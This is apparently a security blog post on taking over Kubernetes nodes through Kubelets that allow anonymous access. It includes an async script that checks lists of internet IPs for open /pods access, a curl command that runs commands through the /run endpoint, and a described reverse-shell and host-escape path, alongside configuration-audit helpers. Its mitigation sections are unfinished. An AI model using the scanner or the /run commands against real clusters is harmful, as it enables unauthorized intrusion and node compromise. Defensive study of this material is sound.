Exploitation of Exposed Kubelets - From Misconfiguration to Complete Compromise

Introduction & Motivation

Kubelet misconfigurations continue to be one of the most impactful attack vectors in Kubernetes environments. An attacker with access to the Kubelet can remotely execute commands in running containers, bypassing API server controls and RBAC permissions entirely. Where nodes are internet-facing, a single exposed Kubelet can quickly lead to complete node compromise.

In this post, I'll demonstrate how to quickly identify an exposed Kubelet, construct a minimal payload to exploit it, and understand the immediate impact on your cluster’s security posture.

Securing the Kubelet is a critical step that directly influences the trust boundary between your control plane and the workloads running on each node.

Overview of the /run Endpoint

The Kubelet, the primary node agent in Kubernetes, exposes several HTTP endpoints for node management and monitoring. Among these, the /run endpoint is particularly noteworthy because it executes commands directly inside a pod's containers. It is part of the Kubelet's API, which listens on port 10250 by default.
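Whether the Kubelet answers unauthenticated callers comes down to two settings in its configuration: anonymous authentication and the authorization mode. When anonymous authentication is enabled and authorization is set to AlwaysAllow, every request to port 10250 is served without credentials, and that includes /run. Here's a minimal sketch that audits an already-parsed KubeletConfiguration (kubelet.config.k8s.io/v1beta1) dictionary for those settings plus the read-only port. The function names are my own. An absent key is treated as "off" here, even though the kubelet's real defaults may differ (the --anonymous-auth flag, for instance, defaults to true).

```python
from typing import Any


def _anonymous_enabled(config: dict[str, Any]) -> bool:
    # authentication.anonymous.enabled; a missing key is treated as disabled (assumption)
    return config.get("authentication", {}).get("anonymous", {}).get("enabled") is True


def _always_allow(config: dict[str, Any]) -> bool:
    # authorization.mode is either "Webhook" or "AlwaysAllow"
    return config.get("authorization", {}).get("mode") == "AlwaysAllow"


def allows_anonymous_api(config: dict[str, Any]) -> bool:
    """True when unauthenticated requests are both accepted and authorized."""
    return _anonymous_enabled(config) and _always_allow(config)


def kubelet_exposure_findings(config: dict[str, Any]) -> list[str]:
    """List the settings in a parsed KubeletConfiguration that widen exposure."""
    findings = []
    if _anonymous_enabled(config):
        findings.append("authentication.anonymous.enabled is true")
    if _always_allow(config):
        findings.append("authorization.mode is AlwaysAllow")
    read_only_port = config.get("readOnlyPort", 0)
    if read_only_port:
        # The read-only port performs no authentication or authorization at all
        findings.append(f"readOnlyPort is {read_only_port} (no authentication)")
    return findings


if __name__ == "__main__":
    misconfigured = {
        "authentication": {"anonymous": {"enabled": True}},
        "authorization": {"mode": "AlwaysAllow"},
        "readOnlyPort": 10255,
    }
    print(allows_anonymous_api(misconfigured))
    for finding in kubelet_exposure_findings(misconfigured):
        print(finding)
```

I split the checks into small helpers so that the "both settings together" verdict and the per-setting findings stay consistent with each other.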

Discovery: Finding an Exposed Kubelet

Identifying an exposed Kubelet is straightforward with standard network scanning tools or with search engines like Shodan. The Kubelet API typically listens on port 10250. In some configurations, an additional read-only port is available on 10255, which serves data without any authentication.


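For checking your own nodes, a plain TCP connect against those two ports is often the quickest first step. This is a minimal, stdlib-only sketch. The function name and the default 2-second timeout are my own choices. A successful connect only tells you that something is listening; it says nothing about whether authentication is required.

```python
import socket

# The two ports mentioned above; labels are descriptive only
KUBELET_PORTS = {10250: "Kubelet API (HTTPS)", 10255: "read-only port (HTTP)"}


def open_kubelet_ports(host: str, ports: dict[int, str] = KUBELET_PORTS,
                       timeout: float = 2.0) -> dict[int, str]:
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    reachable = {}
    for port, label in ports.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 on success and an error code (e.g. refused or
            # timed out) instead of raising; DNS failures can still raise
            if sock.connect_ex((host, port)) == 0:
                reachable[port] = label
    return reachable
```

Calling open_kubelet_ports with the address of a node you administer returns a dict of whichever of the two ports answered. Any node where 10255 shows up is worth a closer look.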

Let's try this out with a Shodan search. The query port:10250 product:"Kubernetes" lists hosts that Shodan has fingerprinted as Kubernetes with port 10250 reachable from the public internet.

Great, but if we visit one of these and request the /pods path, we'll most likely get an Unauthorized (401) or Forbidden (403) response. A node is usually only exploitable if /pods answers without authentication, so let's write a quick script that asynchronously works through a list of IPs and flags any that return a 200 status code at /pods.

```python
import asyncio
import logging
import ssl

import aiohttp

# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

# Constants
CONCURRENT_REQUESTS = 100
REQUEST_TIMEOUT = aiohttp.ClientTimeout(total=5)  # per request, in seconds
IP_FILE = "ips.txt"  # one IP address per line


async def fetch(session, semaphore, ip):
    # The Kubelet API on port 10250 speaks HTTPS, not plain HTTP
    url = f"https://{ip}:10250/pods"
    async with semaphore:
        try:
            async with session.get(url, timeout=REQUEST_TIMEOUT) as response:
                if response.status == 200:
                    data = await response.text()
                    logger.info(f"Success: {ip} - {len(data)} bytes received")
                else:
                    logger.warning(f"Failed: {ip} - Status {response.status}")
        except (aiohttp.ClientError, asyncio.TimeoutError) as e:
            # repr() because timeout errors have an empty str()
            logger.error(f"Error: {ip} - {e!r}")


async def main():
    # Read IPs from file, skipping blank lines
    with open(IP_FILE) as f:
        ips = [line.strip() for line in f if line.strip()]

    # Kubelet serving certificates are often self-signed, so skip verification
    ssl_context = ssl.create_default_context()
    ssl_context.check_hostname = False
    ssl_context.verify_mode = ssl.CERT_NONE

    # The semaphore keeps queued requests from spending their timeout
    # waiting for a free connection in the pool
    semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)
    connector = aiohttp.TCPConnector(limit=CONCURRENT_REQUESTS, ssl=ssl_context)
    async with aiohttp.ClientSession(connector=connector) as session:
        await asyncio.gather(*(fetch(session, semaphore, ip) for ip in ips))


if __name__ == "__main__":
    asyncio.run(main())
```
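The script above only treats a 200 as interesting. When you're auditing your own fleet, though, the status code of a refused request also hints at how each node is configured. This sketch maps the common cases. The mapping reflects how kubelets typically answer an unauthenticated GET and is a heuristic rather than a guarantee. The function name is hypothetical.

```python
def classify_kubelet_response(status: int) -> str:
    """Interpret the status of an unauthenticated GET /pods on port 10250.

    Heuristic (assumed typical kubelet behaviour):
      200 -> anonymous requests are authorized (e.g. authorization mode AlwaysAllow)
      401 -> anonymous authentication is disabled
      403 -> anonymous requests are accepted as system:anonymous but denied by
             webhook authorization
    """
    if status == 200:
        return "exposed: anonymous requests are authorized"
    if status == 401:
        return "anonymous authentication disabled"
    if status == 403:
        return "anonymous authentication enabled, but authorization denies it"
    return f"inconclusive (HTTP {status})"
```

Inside fetch, you could log classify_kubelet_response(response.status) instead of the plain success and failure messages.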

To verify this, I spun up my own Kubernetes cluster with a misconfigured Kubelet. I didn't want to spend my hard-earned money on Shodan credits, and it wouldn't exactly be ethical to poke at real, genuinely vulnerable clusters. But assuming we found one, a request to /pods should return something like this:

```shell
curl -k -X GET https://<node-ip>:10250/pods
```

```json
{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "es10.1.81.15",
        "namespace": "default",
        "selfLink": "/api/v1/namespaces/default/pods/es10.1.81.15",
        "uid": "f4dad182df03f768c15ad32b7a53e0e0",
        "creationTimestamp": null,
        "annotations": {}
      },
      "spec": {
        "volumes": [],
        "containers": [
          {
            "name": "elasticsearch",
            "image": "elastisearch/es:7.9.3",
            "command": [
              "/bin/bash"
            ],
            "ports": [
              {
                "hostPort": 9200,
                "containerPort": 9200,
                "protocol": "TCP"
              }
            ],
            "env": [],
            "resources": {},
            "volumeMounts": [],
            "securityContext": {
              "capabilities": {
                "add": [
                  "IPC_LOCK"
                ]
              },
              "privileged": true
            }
          }
        ]
      }
    }
  ]
}
```
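With a real node, the pod list can run to many screens, so it helps to filter it down to the containers that matter. This is a minimal sketch that walks a parsed /pods response and flags containers that are privileged, add Linux capabilities, or bind host ports. The function name and the choice of those three signals are my own. SAMPLE_POD_LIST is a trimmed copy of the response above.

```python
from typing import Any

# Trimmed copy of the sample /pods response above
SAMPLE_POD_LIST = {
    "kind": "PodList",
    "items": [{
        "metadata": {"name": "es10.1.81.15", "namespace": "default"},
        "spec": {"containers": [{
            "name": "elasticsearch",
            "ports": [{"hostPort": 9200, "containerPort": 9200, "protocol": "TCP"}],
            "securityContext": {"capabilities": {"add": ["IPC_LOCK"]}, "privileged": True},
        }]},
    }],
}


def risky_containers(pod_list: dict[str, Any]) -> list[dict[str, Any]]:
    """Return containers that are privileged, add capabilities, or use hostPort."""
    findings = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        for container in pod.get("spec", {}).get("containers", []):
            sc = container.get("securityContext") or {}
            caps = (sc.get("capabilities") or {}).get("add", [])
            host_ports = [p["hostPort"] for p in container.get("ports", []) if p.get("hostPort")]
            if sc.get("privileged") or caps or host_ports:
                findings.append({
                    "pod": f'{meta.get("namespace")}/{meta.get("name")}',
                    "container": container.get("name"),
                    "privileged": bool(sc.get("privileged")),
                    "added_capabilities": caps,
                    "host_ports": host_ports,
                })
    return findings


if __name__ == "__main__":
    for finding in risky_containers(SAMPLE_POD_LIST):
        print(finding)
```

If you saved the live response to a file with curl, passing json.load on that file to risky_containers works the same way.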

Lucky us: they even left a privileged container running, so we're well on our way to a full takeover! Let's move on to the next step.

Exploitation: Leveraging /run to Achieve RCE

Once an exposed Kubelet is identified, the /run endpoint can be used to execute arbitrary commands inside the containers running on that node, bypassing the Kubernetes control plane and its RBAC policies. Note that /run does not launch a new image. Instead, it runs a command in an existing container, addressed by namespace, pod and container name, and the command is passed as a cmd form parameter. Using the privileged elasticsearch container from the /pods output above, a harmless proof of execution looks like this:

```shell
curl -k -X POST https://<node-ip>:10250/run/default/es10.1.81.15/elasticsearch \
  -d "cmd=id"
```

The Kubelet returns the command's output in the response body. Swap id for a reverse-shell one-liner aimed at a netcat listener on our own machine (say, on port 4444) and we have an interactive shell inside the container. Because this container is privileged, that is effectively a shell on the node. From here we can mount the host's storage devices to get full access to its file system, or load kernel modules. As long as the container has the right permissions, the world is our oyster :-). Needless to say, an exploitation like this can lead to full control over the node, data exfiltration, and lateral movement within the cluster.

Mitigation & Hardening (Core Best Practices)

In progress...

Conclusion & Call to Action

In progress...